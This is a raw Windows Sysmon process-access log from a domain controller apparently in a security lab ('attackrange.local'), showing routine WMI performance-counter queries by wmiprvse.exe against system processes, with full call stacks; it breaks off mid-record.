13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007914Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007913Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007912Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007911Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007910Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007909Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007908Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007907Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007906Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007905Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007904Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007903Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007902Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008003Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.886{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-862E-5FCF-5C01-000000009101}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008002Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.886{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008001Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.886{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008000Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:02.886{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007999Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 